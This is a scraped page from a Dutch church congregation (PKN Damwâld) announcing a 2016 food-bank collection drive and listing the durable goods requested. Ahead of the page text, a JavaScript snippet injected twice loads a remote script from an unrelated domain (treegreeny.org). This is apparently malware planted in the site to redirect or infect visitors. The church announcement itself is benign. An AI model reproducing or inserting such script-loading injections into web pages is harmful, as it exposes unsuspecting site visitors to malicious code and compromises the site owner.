;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Actie voedselbank ... Helpt u mee ?! - PKN Damwâld

Actie voedselbank … Helpt u mee ?!

Gepubliceerd op: maandag 24 oktober 2016

Voor het derde jaar op rij, organiseren beide diaconieën een actie om de plaatselijke voedselbank te steunen: het verzoek aan de leden van beide gemeentes is om weer extra voedselproducten te kopen en die in te leveren! Dat kan op de zondag voor en na Dankstond en op de avond van Dankstond. Afgelopen zondag was het eerste inlevermoment, meestal en vooral voor mensen die de dienst op woensdagavond niet kunnen bijwonen. Maandagavond 31 oktober is de eerste “oogst” ingeleverd bij de Voedselbank, zie de foto’s.
De opbrengst van Hervormd was daar nog niet bij. Zoals u ziet, al een mooi resultaat! Alle gevers HARTELIJK dank !

Met deze actie willen we graag de voorraden van de voedselbank in Damwâld aanvullen. Het gaat daarbij vooral om houdbare producten. Op het lijstje van de voedselbank staan bijv. koffie, thee, suiker, pakken houdbare melk/chocomelk en koffiemelk, wasmiddel, bak- en braadolie, groente en fruit in blik, macaroni, spaghetti, rijst, hagelslag, jam en pindakaas enz. U kunt uw producten  komende zondag 6 november inleveren rond de kerkdiensten in de Bonifatiuskerk, De Ikker en De Ontmoeting. Uit contact blijkt dat de voedselbank dit jaar 5 jaar bestaat, maar ook dat de opbrengsten erg tegenvallen én dat er tekorten zijn. Misschien dat wij als gemeentes kunnen zorgen voor een mooi eerste lustrum door een (nog) hogere opbrengst dan voorgaande jaren. U doet toch mee? Hartelijk dank!  Wij houden u verder op de hoogte o.a. via de website!

dsc03380